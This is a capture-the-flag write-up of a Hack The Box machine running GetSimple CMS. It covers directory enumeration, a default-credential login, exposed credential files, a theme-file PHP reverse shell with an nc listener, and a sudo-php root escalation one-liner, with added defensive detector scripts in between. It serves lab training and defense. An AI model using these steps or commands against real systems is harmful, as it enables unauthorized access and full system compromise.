Easy HTB machine where I exploit a webserver with GetSimple CMS.
Introduction
I will use gobuster to find a hidden login page and use default credentials to get initial access. I get a www-data shell through a reverse shell, and escalate privileges to root via the sudo access to /usr/bin/php.
Enumeration
nmap output:
DuxSec@hi$ nmap -sV -T4 -sC 10.129.217.0 -v
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-29 06:19 EDT
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 4c:73:a0:25:f5:fe:81:7b:82:2b:36:49:a5:4d:c8:5e (RSA)
| 256 e1:c0:56:d0:52:04:2f:3c:ac:9a:e7:b1:79:2b:bb:13 (ECDSA)
|_ 256 52:31:47:14:0d:c3:8e:15:73:e3:c4:24:a2:3a:12:77 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Welcome to GetSimple! - gettingstarted
| http-robots.txt: 1 disallowed entry
|_/admin/
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
NSE: Script Post-scanning.
Initiating NSE at 06:19
Completed NSE at 06:19, 0.00s elapsed
Initiating NSE at 06:19
Completed NSE at 06:19, 0.00s elapsed
Initiating NSE at 06:19
Completed NSE at 06:19, 0.01s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.82 seconds
Ports 22 and 80 are open. Let’s have a look at the website, and while I am browsing I start a gobuster scan.
Host configuration
I tried to go to http://10.129.217.0, but the page took ages to load, so I added the IP to my /etc/hosts file with the following line:
10.129.217.0 gettingstarted.htb
After this change I could visit http://gettingstarted.htb without delay. I read in the HTB forums later on that multiple people had this issue.
Gobuster results
That took some time, and the gobuster scan has already finished, so let’s look at the results.
DuxSec@hi$ gobuster dir -u http://10.129.217.0 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.129.217.0
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Timeout: 10s
===============================================================
2023/06/29 06:20:22 Starting gobuster in directory enumeration mode
===============================================================
/.htpasswd (Status: 403) [Size: 277]
/.hta (Status: 403) [Size: 277]
/admin (Status: 301) [Size: 312] [--> http://10.129.217.0/admin/]
/backups (Status: 301) [Size: 314] [--> http://10.129.217.0/backups/]
/.htaccess (Status: 403) [Size: 277]
/data (Status: 301) [Size: 311] [--> http://10.129.217.0/data/]
/index.php (Status: 200) [Size: 5485]
/plugins (Status: 301) [Size: 314] [--> http://10.129.217.0/plugins/]
/robots.txt (Status: 200) [Size: 32]
/server-status (Status: 403) [Size: 277]
/sitemap.xml (Status: 200) [Size: 431]
/theme (Status: 301) [Size: 312] [--> http://10.129.217.0/theme/]
Progress: 4444 / 4615 (96.29%)
===============================================================
2023/06/29 06:20:35 Finished
===============================================================
Many hits! /admin looks very interesting; it shows us the following login page:
I try the credentials admin:admin and I am in the admin panel!
I still checked the other gobuster hits to see if there is anything interesting, and found that several directories are listable, which might be helpful later on. Some examples:
http://gettingstarted.htb/data/other/authorization.xml
<item>
<apikey>4f399dc72ff8e619e327800f851e9986</apikey>
</item>
http://gettingstarted.htb/data/users/admin.xml
<item>
<USR>admin</USR>
<NAME/>
<PWD>d033e22ae348aeb5660fc2140aec35850c4da997</PWD>
<EMAIL>admin@gettingstarted.com</EMAIL>
<HTMLEDITOR>1</HTMLEDITOR>
<TIMEZONE/>
<LANG>en_US</LANG>
</item>
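Everything in the enumeration above leaves a trace in the Apache access log: a burst of 404s from one client while gobuster runs, and a 200 for a file under /data/ that anonymous users should never be able to fetch. The following detector is an added example written for this writeup, not the author's code; the log lines are constructed, and the list of sensitive GetSimple paths is taken from the directory layout shown above.

```python
# Added example (not from the writeup): flag a directory brute-force burst and a
# successful fetch of a GetSimple data file in Apache combined-format access logs.
import re
from collections import defaultdict
from datetime import datetime

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# GetSimple locations holding users, the API key and backups (layout from the writeup).
# A 200 for any of these from the outside means the data directory is exposed.
SENSITIVE_PREFIXES = ("/data/users/", "/data/other/authorization.xml", "/backups/")

# Constructed sample log (not captured from the box): one scanner, one normal visitor.
SAMPLE_LOG = """\
10.10.15.155 - - [29/Jun/2023:06:20:22 -0400] "GET /.htpasswd HTTP/1.1" 403 277
10.10.15.155 - - [29/Jun/2023:06:20:22 -0400] "GET /cgi-bin/ HTTP/1.1" 404 275
10.10.15.155 - - [29/Jun/2023:06:20:23 -0400] "GET /images HTTP/1.1" 404 275
10.10.15.155 - - [29/Jun/2023:06:20:23 -0400] "GET /login HTTP/1.1" 404 275
10.10.15.155 - - [29/Jun/2023:06:20:24 -0400] "GET /uploads HTTP/1.1" 404 275
10.10.15.155 - - [29/Jun/2023:06:20:24 -0400] "GET /wp-admin HTTP/1.1" 404 275
10.10.15.155 - - [29/Jun/2023:06:20:25 -0400] "GET /admin HTTP/1.1" 301 312
10.10.15.155 - - [29/Jun/2023:06:20:25 -0400] "GET /data HTTP/1.1" 301 311
10.10.15.155 - - [29/Jun/2023:06:21:40 -0400] "GET /data/users/admin.xml HTTP/1.1" 200 412
192.0.2.10 - - [29/Jun/2023:06:22:01 -0400] "GET / HTTP/1.1" 200 5485
192.0.2.10 - - [29/Jun/2023:06:22:02 -0400] "GET /theme/Innovation/style.css HTTP/1.1" 200 1203
"""


def parse_line(line):
    """Return a dict with ip, ts (aware datetime), method, path, status (int), or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["status"] = int(rec["status"])
    return rec


def detect(log_text, window_seconds=60, miss_threshold=5):
    """Return (kind, ip, detail) findings: 'dirbust' and 'exposed_file'."""
    findings = []
    misses = defaultdict(list)      # ip -> timestamps of recent 404 responses
    already_flagged = set()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        ip, path, status, ts = rec["ip"], rec["path"], rec["status"], rec["ts"]
        if status == 404:
            # keep only the misses inside the sliding window, then compare to the threshold
            misses[ip] = [t for t in misses[ip] if (ts - t).total_seconds() <= window_seconds]
            misses[ip].append(ts)
            if len(misses[ip]) >= miss_threshold and ip not in already_flagged:
                already_flagged.add(ip)
                findings.append(("dirbust", ip, f"{len(misses[ip])} 404s within {window_seconds}s"))
        if status == 200 and path.startswith(SENSITIVE_PREFIXES):
            findings.append(("exposed_file", ip, path))
    return findings


if __name__ == "__main__":
    for kind, ip, detail in detect(SAMPLE_LOG):
        print(f"{kind:13} {ip:15} {detail}")
```

The threshold and window are deliberately modest; on a real site tune them against a day of normal traffic first, and pair the exposed_file rule with a web server rule that denies /data/, /backups/ and the admin data files to anonymous clients so the alert never fires with a 200 in the first place.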
The next step is to get a reverse shell. I chose to use https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php due to its simplicity, and replace the original theme code with the reverse shell. Now I can open a nc listener and browse to http://gettingstarted.htb. Normally the page would load the theme file, but since that is now my reverse shell, it executes that instead. It connects back to me and I successfully get a shell as www-data.
DuxSec@hi$ nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.15.155] from (UNKNOWN) [10.129.162.83] 52066
Linux gettingstarted 5.4.0-65-generic #73-Ubuntu SMP Mon Jan 18 17:25:17 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
14:28:43 up 30 min, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
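The code execution above works because the theme template is a PHP file that the admin panel lets you edit, so a changed theme file is the artifact a defender should be watching for. The following baseline-and-diff check is an added example, not GetSimple's or the author's code; the theme directory layout it builds for the demo and the baseline file location are assumptions.

```python
# Added example (not GetSimple's or the author's code): hash a theme directory, store
# the baseline outside the web root, and on later runs report added, removed or
# modified files, plus any OS-level PHP calls that appeared in a changed template.
import hashlib
import json
import os
import re
import tempfile

# PHP functions that hand a string to the OS or open a raw socket; a theme template
# has no reason to call them, so their appearance in a changed file is a strong signal.
SHELL_CALLS = re.compile(r"\b(shell_exec|exec|system|passthru|proc_open|popen|fsockopen)\s*\(")


def hash_tree(root):
    """Map every file under root (as a /-separated relative path) to its SHA-256 hex digest."""
    digests = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            with open(full, "rb") as fh:
                rel = os.path.relpath(full, root).replace(os.sep, "/")
                digests[rel] = hashlib.sha256(fh.read()).hexdigest()
    return digests


def save_baseline(root, baseline_file):
    """Write the current hashes to a JSON file; keep it outside the web root."""
    with open(baseline_file, "w") as fh:
        json.dump(hash_tree(root), fh, indent=2, sort_keys=True)


def load_baseline(baseline_file):
    with open(baseline_file) as fh:
        return json.load(fh)


def shell_calls_in(path):
    """Sorted, de-duplicated names of the risky PHP functions called in a file."""
    with open(path, errors="replace") as fh:
        return sorted(set(SHELL_CALLS.findall(fh.read())))


def audit(root, baseline):
    """Diff root against baseline; return (kind, relpath, risky_calls) tuples."""
    current = hash_tree(root)
    findings = []
    for rel in sorted(set(baseline) | set(current)):
        if rel not in current:
            findings.append(("removed", rel, ""))
            continue
        if rel not in baseline:
            kind = "added"
        elif baseline[rel] != current[rel]:
            kind = "modified"
        else:
            continue
        calls = shell_calls_in(os.path.join(root, rel)) if rel.endswith(".php") else []
        findings.append((kind, rel, ",".join(calls)))
    return findings


def demo_run():
    """Build a throwaway theme dir, baseline it, tamper with it, return both audit results."""
    work = tempfile.mkdtemp()
    theme_root = os.path.join(work, "theme")
    theme = os.path.join(theme_root, "Innovation")   # assumed theme name for the demo
    os.makedirs(theme)
    template = os.path.join(theme, "template.php")
    with open(template, "w") as fh:
        fh.write("<?php get_header(); ?>\n<h1>Welcome</h1>\n")
    baseline_file = os.path.join(work, "theme-baseline.json")
    save_baseline(theme_root, baseline_file)
    clean = audit(theme_root, load_baseline(baseline_file))
    # Simulate tampering: the template now calls out to the OS, and a stray file appears.
    with open(template, "w") as fh:
        fh.write("<?php echo shell_exec('uname -a'); ?>\n")
    with open(os.path.join(theme, "notes.txt"), "w") as fh:
        fh.write("dropped\n")
    tampered = audit(theme_root, load_baseline(baseline_file))
    return clean, tampered


if __name__ == "__main__":
    before, after = demo_run()
    print("clean run:", before)
    for kind, rel, calls in after:
        print(f"{kind:9} {rel}" + (f"  risky calls: {calls}" if calls else ""))
```

Run save_baseline once after a clean deployment and audit from cron or a file-change hook; on a production GetSimple install the theme directory should also be unwritable by the web server user, so that editing a template requires a deploy step rather than only an admin-panel login.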
To get a fully interactive shell I use Python3:
$ which python3
/usr/bin/python3
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@gettingstarted:/$ ^Z
zsh: suspended nc -lvnp 4444
DuxSec@hi$ stty raw -echo; fg
[1] + continued nc -lvnp 4444
www-data@gettingstarted:/$
User flag
The user flag can be read because www-data has read access to mrb3n’s home directory.
www-data@gettingstarted:/home/mrb3n$ cat user.txt
7002d65b149b0a4d19132a66feed21d8
Root flag
To get the root flag I look for sudo rights, and it shows that www-data can run /usr/bin/php as root without a password.
www-data@gettingstarted:/$ sudo -l
Matching Defaults entries for www-data on gettingstarted:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on gettingstarted:
(ALL : ALL) NOPASSWD: /usr/bin/php
Knowing that php can be run with sudo, I can spawn a root shell through php in the following way:
www-data@gettingstarted:/$ sudo /usr/bin/php -r 'system("/bin/bash");'
root@gettingstarted:/# whoami
root
root@gettingstarted:/# cd /root
root@gettingstarted:~# cat root.txt
root@gettingstarted:~# f1fba6e9f71efb2630e6e34da6387842
If I didn’t know php, I could use https://gtfobins.github.io/gtfobins/php/ to find a privilege escalation one-liner.
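The sudo rule that ends this box is the kind of thing an audit of `sudo -l` output should catch before an attacker does: an interpreter runnable as root, with no password and no pinned arguments. The triage script below is an added example, not the author's code; it parses the `sudo -l` output shown above plus one constructed entry, and SHELL_CAPABLE is a short hand-picked subset of the programs documented on GTFOBins, not an exhaustive list.

```python
# Added example (not the author's): rate `sudo -l` entries by how directly they hand
# out a root shell. The second sample entry is constructed for contrast.
import os
import re
from dataclasses import dataclass

# One `sudo -l` command line looks like: "(ALL : ALL) NOPASSWD: /usr/bin/php, /bin/ls"
ENTRY_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+?)\s*$")

# Hand-picked subset of GTFOBins entries that spawn a shell when run unrestricted.
SHELL_CAPABLE = {"php", "python", "python3", "perl", "ruby", "bash", "sh", "vim", "find", "awk", "env"}

SAMPLE_SUDO_L = r"""
Matching Defaults entries for www-data on gettingstarted:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on gettingstarted:
    (ALL : ALL) NOPASSWD: /usr/bin/php
    (root) /bin/cat /var/log/apache2/error.log
"""


@dataclass
class SudoEntry:
    runas_user: str   # user part of "(user : group)"
    nopasswd: bool
    command: str      # program plus any pinned arguments


def parse_sudo_l(text):
    """Extract one SudoEntry per command from `sudo -l` output; other lines are ignored."""
    entries = []
    for line in text.splitlines():
        m = ENTRY_RE.match(line)
        if not m:
            continue
        runas_user = m["runas"].split(":")[0].strip()
        nopasswd = "NOPASSWD" in re.findall(r"([A-Z]+):", m["tags"])
        for cmd in m["cmds"].split(","):
            cmd = cmd.strip()
            if cmd:
                entries.append(SudoEntry(runas_user, nopasswd, cmd))
    return entries


def rate(entry):
    """'critical': root shell with no password and free arguments; 'high': root shell
    behind a password or pinned arguments; 'review': everything else needs a human look."""
    as_root = entry.runas_user in ("ALL", "root")
    words = entry.command.split()
    program = "ALL" if entry.command == "ALL" else os.path.basename(words[0])
    pinned_args = len(words) > 1
    if as_root and (program == "ALL" or program in SHELL_CAPABLE):
        if entry.nopasswd and not pinned_args:
            return "critical"
        return "high"
    return "review"


def triage(text):
    """Return (rating, runas_user, nopasswd, command) for each entry in the output."""
    return [(rate(e), e.runas_user, e.nopasswd, e.command) for e in parse_sudo_l(text)]


if __name__ == "__main__":
    for rating, runas, nopw, cmd in triage(SAMPLE_SUDO_L):
        print(f"{rating:8} runas={runas:5} nopasswd={str(nopw):5} {cmd}")
```

The fix on a box like this is not a clever sudoers tweak but removing the rule: a web server account almost never needs sudo at all, and if a script must run as root it should be a specific, argument-pinned command rather than a general-purpose interpreter.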